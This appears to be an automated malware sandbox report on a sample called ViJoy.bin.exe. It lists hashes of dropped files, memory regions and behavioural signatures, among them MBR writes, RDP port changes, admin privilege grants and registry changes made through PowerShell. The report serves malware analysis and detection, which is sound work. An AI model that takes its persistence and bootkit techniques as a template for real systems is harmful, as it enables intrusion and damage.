memory/520-62-0x0000000004E30000-0x0000000004E31000-memory.dmp

\Users\Admin\AppData\Roaming\Templers\exe1.exe

MD5 eaee663dfeb2efcd9ec669f5622858e2
SHA1 2b96f0d568128240d0c53b2a191467fde440fd93
SHA256 6c4aab4c3bd1ba8f77a781d70ecbc1b4c7dfd9d3c7ad60158fb8d35d1d4246e2
SHA512 211951f053ddecc6e0545a83119112d6ad375e226437d6a26ed493b362e51da3718131d59fb045c9b2feea91e04d3b82e9be4e52a46fe2e84ed4f3b4ed2213b3

memory/1440-65-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Roaming\Templers\exe1.exe

MD5 eaee663dfeb2efcd9ec669f5622858e2
SHA1 2b96f0d568128240d0c53b2a191467fde440fd93
SHA256 6c4aab4c3bd1ba8f77a781d70ecbc1b4c7dfd9d3c7ad60158fb8d35d1d4246e2
SHA512 211951f053ddecc6e0545a83119112d6ad375e226437d6a26ed493b362e51da3718131d59fb045c9b2feea91e04d3b82e9be4e52a46fe2e84ed4f3b4ed2213b3

\Users\Admin\AppData\Roaming\Templers\exe1.exe

MD5 eaee663dfeb2efcd9ec669f5622858e2
SHA1 2b96f0d568128240d0c53b2a191467fde440fd93
SHA256 6c4aab4c3bd1ba8f77a781d70ecbc1b4c7dfd9d3c7ad60158fb8d35d1d4246e2
SHA512 211951f053ddecc6e0545a83119112d6ad375e226437d6a26ed493b362e51da3718131d59fb045c9b2feea91e04d3b82e9be4e52a46fe2e84ed4f3b4ed2213b3

\Users\Admin\AppData\Roaming\Templers\exe2.exe

MD5 c9622e294a0f3c6c4dfcf716cd2e6692
SHA1 829498d010f331248be9fd512deb44d1eceac344
SHA256 f519d4517271e01ea6807890fcbc1573e64844b6a8105aa7c3462ea65bb3c7fe
SHA512 d7e5bd51a819b1bb8ec59fbca742fbf40806b8e4e04f56efb00c8b5477b275d1479565b3a156628a86254801610dbef13250ef5b2015da1ef21ff869ef60f552

memory/1792-69-0x0000000000000000-mapping.dmp

memory/1440-67-0x00000000415D0000-0x000000004187A000-memory.dmp

C:\Users\Admin\AppData\Roaming\Templers\exe2.exe

MD5 c9622e294a0f3c6c4dfcf716cd2e6692
SHA1 829498d010f331248be9fd512deb44d1eceac344
SHA256 f519d4517271e01ea6807890fcbc1573e64844b6a8105aa7c3462ea65bb3c7fe
SHA512 d7e5bd51a819b1bb8ec59fbca742fbf40806b8e4e04f56efb00c8b5477b275d1479565b3a156628a86254801610dbef13250ef5b2015da1ef21ff869ef60f552

memory/1792-72-0x0000000075891000-0x0000000075893000-memory.dmp

memory/1440-73-0x00000000410A2000-0x00000000410A4000-memory.dmp

memory/1440-74-0x00000000410A4000-0x00000000410A6000-memory.dmp

memory/1440-75-0x00000000410A6000-0x00000000410A7000-memory.dmp

memory/1440-76-0x00000000410A7000-0x00000000410A8000-memory.dmp

memory/2012-78-0x0000000000000000-mapping.dmp

\Users\Public\Documents\Wondershare\NFWCHK.exe

MD5 27cfb3990872caa5930fa69d57aefe7b
SHA1 5e1c80d61e8db0cdc0c9b9fa3b2e36d156d45f8f
SHA256 43881549228975c7506b050bce4d9b671412d3cdc08c7516c9dbbb7f50c25146
SHA512 a1509024872c99c1cf63f42d9f3c5f063afde4e9490c21611551ddd2322d136ce9240256113c525305346cf7b66ccca84c3df67637c8fecbfeebf14ffa373a2a

C:\Users\Public\Documents\Wondershare\NFWCHK.exe

MD5 27cfb3990872caa5930fa69d57aefe7b
SHA1 5e1c80d61e8db0cdc0c9b9fa3b2e36d156d45f8f
SHA256 43881549228975c7506b050bce4d9b671412d3cdc08c7516c9dbbb7f50c25146
SHA512 a1509024872c99c1cf63f42d9f3c5f063afde4e9490c21611551ddd2322d136ce9240256113c525305346cf7b66ccca84c3df67637c8fecbfeebf14ffa373a2a

C:\Users\Public\Documents\Wondershare\NFWCHK.exe.config

MD5 ad0967a0ab95aa7d71b3dc92b71b8f7a
SHA1 ed63f517e32094c07a2c5b664ed1cab412233ab5
SHA256 9c1212bc648a2533b53a2d0afcec518846d97630afb013742a9622f0df7b04fc
SHA512 85766a907331f60044ec205cf345453fc3d44bfcac296ac93a12e8a752b84290dfd94f73b71de82f46f9503177d29602cbb87549f89dc61373d889b4ea26634b

C:\Users\Admin\AppData\Roaming\Templers\exe2.exe

MD5 c9622e294a0f3c6c4dfcf716cd2e6692
SHA1 829498d010f331248be9fd512deb44d1eceac344
SHA256 f519d4517271e01ea6807890fcbc1573e64844b6a8105aa7c3462ea65bb3c7fe
SHA512 d7e5bd51a819b1bb8ec59fbca742fbf40806b8e4e04f56efb00c8b5477b275d1479565b3a156628a86254801610dbef13250ef5b2015da1ef21ff869ef60f552

C:\Users\Public\Documents\Wondershare\NFWCHK.exe

MD5 27cfb3990872caa5930fa69d57aefe7b
SHA1 5e1c80d61e8db0cdc0c9b9fa3b2e36d156d45f8f
SHA256 43881549228975c7506b050bce4d9b671412d3cdc08c7516c9dbbb7f50c25146
SHA512 a1509024872c99c1cf63f42d9f3c5f063afde4e9490c21611551ddd2322d136ce9240256113c525305346cf7b66ccca84c3df67637c8fecbfeebf14ffa373a2a

memory/2012-83-0x0000000000690000-0x0000000000692000-memory.dmp

memory/324-85-0x0000000000000000-mapping.dmp

memory/324-86-0x000007FEFBEA1000-0x000007FEFBEA3000-memory.dmp

memory/324-87-0x0000000002280000-0x0000000002281000-memory.dmp

memory/324-88-0x000000001AB90000-0x000000001AB91000-memory.dmp

memory/324-89-0x0000000002440000-0x0000000002441000-memory.dmp

memory/324-90-0x000000001AB10000-0x000000001AB12000-memory.dmp

memory/324-91-0x000000001AB14000-0x000000001AB16000-memory.dmp

memory/324-92-0x0000000002580000-0x0000000002581000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\ready.ps1

MD5 3447df88de7128bdc34942334b2fab98
SHA1 519be4e532fc53a7b8fe2ae21c9b7e35f923d3bb
SHA256 9520067abc34ce8a4b7931256e4ca15f889ef61750ca8042f60f826cb6cb2ac9
SHA512 2ccf6c187c3e17918daadd1fc7ca6e7dfaf6b958468a9867cca233e3506906164dfeb6104c8324e09d3058b090eab22417695b001ddb84f3d98562aec05eb78f

memory/324-94-0x000000001C3D0000-0x000000001C3D1000-memory.dmp

memory/2012-84-0x000007FEEA940000-0x000007FEEB9D6000-memory.dmp

memory/1276-95-0x0000000000000000-mapping.dmp

\??\c:\Users\Admin\AppData\Local\Temp\onrvk3o1\onrvk3o1.cmdline

MD5 22996ab3f7e17a256f6b64c92f1440ec
SHA1 36c3352794728fb7ec36985eb3fa6e03c8e08d61
SHA256 00e9ca96abe8e0e7713f6d8b17eda86423e8b29eee028250954f71f4f1cd945d
SHA512 7698200e6aa04f1e818a3a9bac213dc84f8052d5df0926d7602f8d2b6e9c634742b8401121c5796c254d18a2b3e03a94d9ece8111cf6facf14467e0020943ad3

\??\c:\Users\Admin\AppData\Local\Temp\onrvk3o1\onrvk3o1.0.cs

MD5 4864fc038c0b4d61f508d402317c6e9a
SHA1 72171db3eea76ecff3f7f173b0de0d277b0fede7
SHA256 0f5273b8fce9bfd95677be80b808119c048086f8e17b2e9f9964ae8971bd5a84
SHA512 9e59e8bee83e783f8054a3ba90910415edacfa63cc19e5ded9d4f21f7c3005ca48c63d85ce8523a5f7d176aa5f8abafc28f824c10dbfb254eed1ce6e5f55bf31

memory/592-98-0x0000000000000000-mapping.dmp

\??\c:\Users\Admin\AppData\Local\Temp\onrvk3o1\CSC85EF2F55F5C9461DAB91D8D18757A.TMP

MD5 08ed9c008442229d7f73e0ead4bf43cc
SHA1 9921bee251c9c9d0c8998c37dc721d49dae33455
SHA256 e9d5910e7ced804c6ca95143474a90fa8d0d388381757d5665caee84effa1fca
SHA512 12b8dd059699b1346affea3dea1d3a9b8ed2b783850384af56248dc86ef73dabf24607385594537c738e6481952793c421bc822b49cb33122c00c3b09def1821

C:\Users\Admin\AppData\Local\Temp\RES63B2.tmp

MD5 dad641a636d8ac8b2f3e339898dae134
SHA1 589e4e91276c5ede8947db7551883746436997be
SHA256 1030100142afab751f61268eaec12e64999bd9b8d038317950e207dc9307c339
SHA512 0f5f488372872854fbfbffde4e299ba6ec6ec7210416f9f89aaa37adc02b0643dc5fbfd686daaae506366c1a363ae959ff800b9e6fb603bc2da5cc5d7cf36b67

memory/324-102-0x00000000022C0000-0x00000000022C1000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\onrvk3o1\onrvk3o1.dll

MD5 01a6332987393cd457164f3c64d1acb3
SHA1 498d2678223fddb1685addecbd2303dda0814777
SHA256 339bf6cb96985dbe4ee60aaf2dc3d4622c018766732f6741d898fc10024b15cf
SHA512 1684bc119955550beba5b3df34e55d3c97164c2ec89e033cde4138f1ff78debc71b324b838d00310084afe76e6c0f6680df4a6de59c75415368c5fe31ef43579

C:\Users\Admin\AppData\Local\Temp\resolve-domain.PS1

MD5 43473f4e719958639a9d89e5d8388999
SHA1 ccb79eb606a23daa4b3ff8f996a2fbf281f31491
SHA256 ce84b142a2983e1f60b3051cbff38153424a016178ce3fcf703e3694eb474734
SHA512 1051092c5eae13758e8e01086907effc5c603cc1f9456fb2cdb951cb4b196c5c3d089ffd2e981b5d6731b0e6b24402fb2808a20f66ac6dcb1704a8f4b457b1fa

memory/324-104-0x000000001B600000-0x000000001B601000-memory.dmp

memory/324-105-0x000000001C2C0000-0x000000001C2C1000-memory.dmp

memory/324-106-0x000000001C4A0000-0x000000001C4A1000-memory.dmp

memory/1592-107-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5 86713cf6e8877d4a97073e50e55b6b22
SHA1 7322f65342dad4888eee2edbefc7450d1560ebe1
SHA256 798743adfdf578c7b35266e74c5aa7e265a11f5ccff3e74311006f7b23d55b2e
SHA512 d9efbd4155bf99a2f0bbe2f66f2ef04e0c4d2aa624add5acc6f0aab4a2f22d742a86102d3756f5f86ccd9d33165d106ddb02c87247dd7a91b58bf7546872a900

memory/1592-113-0x0000000002590000-0x0000000002591000-memory.dmp

memory/1592-115-0x000000001ABA0000-0x000000001ABA1000-memory.dmp

memory/1592-117-0x000000001B560000-0x000000001B561000-memory.dmp

memory/1592-118-0x0000000001FD0000-0x0000000001FD1000-memory.dmp

memory/1592-119-0x000000001AC30000-0x000000001AC32000-memory.dmp

memory/324-121-0x000000001AB1A000-0x000000001AB39000-memory.dmp

memory/1592-120-0x000000001AC34000-0x000000001AC36000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex

MD5 de8edb958221e7ed4f31c39c5af97bf1
SHA1 c6d51383c2769f1ff60b0fe11748c8f4b5c16a4b
SHA256 56172814a2b22132fce1580d6e07e554af3f65254cc0e00d860d5c939845d4e2
SHA512 ba4ee81a15c1155886854494cc507a8a6ab1b650fccef298aba22fe114ff801a63ff746ea0baf8b2c681d7db32842d13279977dc011adac54a481d8d29b0e848

memory/1592-126-0x000000001B690000-0x000000001B691000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_298019a0-6dd5-4646-890b-a6ff115313a7

MD5 6f0d509e28be1af95ba237d4f43adab4
SHA1 c665febe79e435843553bee86a6cea731ce6c5e4
SHA256 f545be30e70cd6e1b70e98239219735f6b61c25712720bb1e1738f02be900e7e
SHA512 8dbadc140fd18eb16e2a282e3a0a895299b124850e7b9454a3f24e1cc1c090c5bebfbff5062e8807369e84ed7359e0854722cfd45b9a63681f9fea8c97fab797

memory/1592-139-0x000000001B6E0000-0x000000001B6E1000-memory.dmp

memory/1592-140-0x000000001B840000-0x000000001B841000-memory.dmp

memory/1144-141-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5 86713cf6e8877d4a97073e50e55b6b22
SHA1 7322f65342dad4888eee2edbefc7450d1560ebe1
SHA256 798743adfdf578c7b35266e74c5aa7e265a11f5ccff3e74311006f7b23d55b2e
SHA512 d9efbd4155bf99a2f0bbe2f66f2ef04e0c4d2aa624add5acc6f0aab4a2f22d742a86102d3756f5f86ccd9d33165d106ddb02c87247dd7a91b58bf7546872a900

memory/1144-147-0x000000001AA84000-0x000000001AA86000-memory.dmp

memory/1144-146-0x000000001AA80000-0x000000001AA82000-memory.dmp

memory/1144-149-0x000000001A820000-0x000000001A821000-memory.dmp

memory/1144-151-0x000000001B750000-0x000000001B751000-memory.dmp

memory/1144-153-0x000000001AA10000-0x000000001AA11000-memory.dmp

memory/1144-154-0x00000000022F0000-0x00000000022F1000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex

MD5 7b308811e1c952bc4520c55e2da3d523
SHA1 cb208adf2a26b9b2fcc919cbfaf0e112914b44cd
SHA256 1a95412d7cac095a0a4cca096cfd341aa0e5262b0bbce333f010b020fc4a3ac6
SHA512 b37774d4039e0c29c82e8fca20db6f1b48465baefa8c88f83e67778244d9952383e4c095d8c300ef3ebeef165221c6182d5d0bfe6d3b830c6da99789975b6668

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_4affe4b2-7a8d-46ab-bdbe-3e0c98556b74

MD5 a70ee38af4bb2b5ed3eeb7cbd1a12fa3
SHA1 81dbaeae4b0f9e1adc0a1e3d6d76a12396498ba9
SHA256 dd2f41f92f19c3fe031bdf5da68ab06768e26762d0077b290cd0094df1d5d58d
SHA512 8c69a5300c7545c5c4b25a0594e6813b6b7a85b5f3ae7fc5464b4074fe6f50b2f49d31cacf19bc20a02bb8e237656f1b9b2a3f6a3953e3a8478ca2adc154e0e3

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_10e4f2b3-4976-4812-af34-7d339d387442

MD5 faa37917b36371249ac9fcf93317bf97
SHA1 a0f0d84d58ee518d33a69f5f1c343aa921c8ffd4
SHA256 b92f1a891dbe4152a1f834774cc83378d8b4cffb7e344a813219d74ec4084132
SHA512 614d3692e5be7554a72a38af408458254af271eaf6855f322ae07aaa647b1478c7ad13027285c8d9999db3739d65ac85ecfdf3e56acca8484083aa0e31de2198

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_65e58f35-049a-4241-9d78-2ff6101089fd

MD5 2d5cd190b5db0620cd62e3cd6ba1dcd3
SHA1 ff4f229f4fbacccdf11d98c04ba756bda80aac7a
SHA256 ab9aee31b3411bcc5a5fb51e9375777cca79cfb3a532d93ddd98a5673c60571d
SHA512 edb2a46f3ee33b48f8fe0b548c1e7940978d0e4ac90d5090807d8b5c8b1320217e5d66990b1d0a85546acbbaf9b601590d35de87de234da8eafd60d12fdce610

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_59011c0b-6c2b-4eee-bb49-358141eeacd8

MD5 d89968acfbd0cd60b51df04860d99896
SHA1 b3c29916ccb81ce98f95bbf3aa8a73de16298b29
SHA256 1020cc7c929cd5a4e68ccb40353ca76f427df363f0d95e456eb79db039bdb2b9
SHA512 b0e886cce598371b59131fed1535e220c798691bad93ef9474ba440066f5a6bd77a60966604b7a5ff6298b2e200c9dd0c8f9f04aff208b2af423480ead4e8842

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_4de30aa8-244a-488c-9fb4-381dadbd874d

MD5 e5b3ba61c3cf07deda462c9b27eb4166
SHA1 b324dad73048be6e27467315f82b7a5c1438a1f9
SHA256 b84fae85b6203a0c8c9db3ba3c050c97d6700e5c9ae27dd31c103ec1bbb02925
SHA512 a5936a098db2e8c0d0231fd97d73cc996ad99897fd64f0e5c6761c44b8eb2db2bff477843d326503e6027c1113da0e8e35f4227195a3cf505c5a374ebe0f67fc

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_af71afb2-37ab-4118-bb8d-1d4f9fc45baa

MD5 7f79b990cb5ed648f9e583fe35527aa7
SHA1 71b177b48c8bd745ef02c2affad79ca222da7c33
SHA256 080ec69d3f2abac629a0bdc314f150ad42a9a1b0a031b1d5c7b5b80051c48683
SHA512 20926edf7f0b990da4bd8d7ba91bd8bf7b952b75080f687afa7197a91777604688303d38b4a0a7240b558c23f2e0cd927d3590765109f8be0551f5eb050eafda

memory/2004-162-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5 86713cf6e8877d4a97073e50e55b6b22
SHA1 7322f65342dad4888eee2edbefc7450d1560ebe1
SHA256 798743adfdf578c7b35266e74c5aa7e265a11f5ccff3e74311006f7b23d55b2e
SHA512 d9efbd4155bf99a2f0bbe2f66f2ef04e0c4d2aa624add5acc6f0aab4a2f22d742a86102d3756f5f86ccd9d33165d106ddb02c87247dd7a91b58bf7546872a900

memory/2004-169-0x00000000028B4000-0x00000000028B6000-memory.dmp

memory/2004-168-0x00000000028B0000-0x00000000028B2000-memory.dmp

\??\PIPE\lsarpc

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

memory/1168-178-0x0000000000000000-mapping.dmp

C:\Windows\system32\rfxvmt.dll

MD5 dc39d23e4c0e681fad7a3e1342a2843c
SHA1 58fd7d50c2dca464a128f5e0435d6f0515e62073
SHA256 6d9a41a03a3bd5362e3af24f97ba99d2f9927d1375e4f608942a712866d133b9
SHA512 5cb75e04ce9f5c3714e30c4fd5b8dbcd3952c3d756556dd76206111fe5b4e980c6c50209ab0914ab3afe15bd9c33ff0d49463ca11547214122859918de2a58f7

memory/860-180-0x0000000000000000-mapping.dmp

memory/1124-181-0x0000000000000000-mapping.dmp

memory/856-182-0x0000000000000000-mapping.dmp

memory/1584-183-0x0000000000000000-mapping.dmp

memory/1476-184-0x0000000000000000-mapping.dmp

memory/1520-185-0x0000000000000000-mapping.dmp

memory/1488-186-0x0000000000000000-mapping.dmp

memory/1644-187-0x0000000000000000-mapping.dmp

memory/880-188-0x0000000000000000-mapping.dmp

memory/936-189-0x0000000000000000-mapping.dmp

memory/1692-190-0x0000000000000000-mapping.dmp

memory/2004-191-0x0000000000000000-mapping.dmp

memory/1168-192-0x0000000000000000-mapping.dmp

memory/860-193-0x0000000000000000-mapping.dmp

memory/1592-194-0x0000000000000000-mapping.dmp

memory/1144-195-0x0000000000000000-mapping.dmp

memory/556-196-0x0000000000000000-mapping.dmp

memory/1584-197-0x0000000000000000-mapping.dmp

memory/1712-198-0x0000000000000000-mapping.dmp

memory/956-199-0x0000000000000000-mapping.dmp

\Windows\Branding\mediasrv.png

MD5 271eacd9c9ec8531912e043bc9c58a31
SHA1 c86e20c2a10fd5c5bae4910a73fd62008d41233b
SHA256 177d6aab26c15ecf87f29f92ad0eaff355d195de1c0ef17d9cb9b7483c288934
SHA512 87375d3e0c2505ff8d5860db4a9a2cbb88da73f492f2be937b1dfd1afa37133061b7c69121727728835eaf545ce1850ec4889bad33366b8d4dadd7838af791c0

\Windows\Branding\mediasvc.png

MD5 1fa9c1e185a51b6ed443dd782b880b0d
SHA1 50145abf336a196183882ef960d285bd77dd3490
SHA256 f25560518e8bebbc0abdde4c0241833e432ad4c56f934bb18067c1abf7305959
SHA512 16bd50a904fa062f8ec6e41f00000da5d0221164c3eda90bc1791e195b25ef74bb9e1264d7536c204f9a01ca1489ae43484ceb1e7bb4f650aacf90fa16f1c9fc

memory/1692-202-0x0000000000000000-mapping.dmp

memory/380-203-0x0000000000000000-mapping.dmp

memory/1120-204-0x0000000000000000-mapping.dmp

memory/1520-205-0x0000000000000000-mapping.dmp

memory/740-206-0x0000000000000000-mapping.dmp

memory/2012-207-0x0000000000000000-mapping.dmp

memory/1168-208-0x0000000000000000-mapping.dmp

memory/1592-209-0x0000000000000000-mapping.dmp

memory/1432-210-0x0000000000000000-mapping.dmp

memory/1456-211-0x0000000000000000-mapping.dmp

memory/1644-212-0x0000000000000000-mapping.dmp

memory/904-213-0x0000000000000000-mapping.dmp

memory/916-214-0x0000000000000000-mapping.dmp

memory/1644-215-0x0000000000000000-mapping.dmp

memory/1456-216-0x0000000000000000-mapping.dmp

memory/940-217-0x0000000000000000-mapping.dmp

\??\PIPE\srvsvc

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

memory/940-224-0x00000000195D0000-0x00000000195D2000-memory.dmp

memory/940-225-0x00000000195D4000-0x00000000195D6000-memory.dmp

memory/940-254-0x00000000195DA000-0x00000000195F9000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Setup.zip

MD5 36f178576dcb8db35d6f06448b1eb510
SHA1 62277c90cc2b1bb81b36571037afe5081b0605d5
SHA256 192fed6a13a0e73d5196a43bc72eeac16e4962ce465ea67dd60d8b16368c215a
SHA512 9e1dfe8e5196afb5a39d5302d6948cc7282b95c77aba435ed14453094022a302a6c780fbfd2615377d94e2b7e2913601e9129eb6d3398db0ba25344075e5dc96

memory/984-256-0x0000000000000000-mapping.dmp

memory/556-257-0x0000000000000000-mapping.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2021-07-21 08:36

Reported

2021-07-21 08:38

Platform

win10v20210410

Max time kernel

128s

Max time network

113s

Command Line

"C:\Users\Admin\AppData\Local\Temp\ViJoy.bin.exe"

Signatures

Grants admin privileges

Modifies RDP port number used by Windows

Sets DLL path for service in the registry

persistence

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Writes to the Master Boot Record (MBR)

bootkit persistence
Description Indicator Process Target
File opened for modification \??\PhysicalDrive0 C:\Users\Admin\AppData\Roaming\Templers\exe2.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File opened for modification C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.DAT C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.INI C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.DAT C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.INI C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI5DA7.tmp C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\INetCache\counters2.dat C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\branding\mediasvc.png C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\branding\ShellBrd C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI5DC8.tmp C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\branding\mediasrv.png C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_wq0c2djq.mgk.psm1 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI5DD9.tmp C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\branding\mediasrv.png C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\branding\wupsvc.jpg C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\branding\Basebrd C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\TMP4352$.TMP C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI5D87.tmp C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI5DB8.tmp C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\branding\mediasvc.png C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\branding\wupsvc.jpg C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_5zuegjl3.xmj.ps1 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Enumerates physical storage devices

Modifies data under HKEY_USERS

Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\CurrentLevel = "0" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\PMDisplayName = "Computer [Protected Mode]" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Root\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\Flags = "1" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\ftp = "3" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\SelfHealCount = "1" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\1400 = "1" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\DisplayName = "My Computer" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Root C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
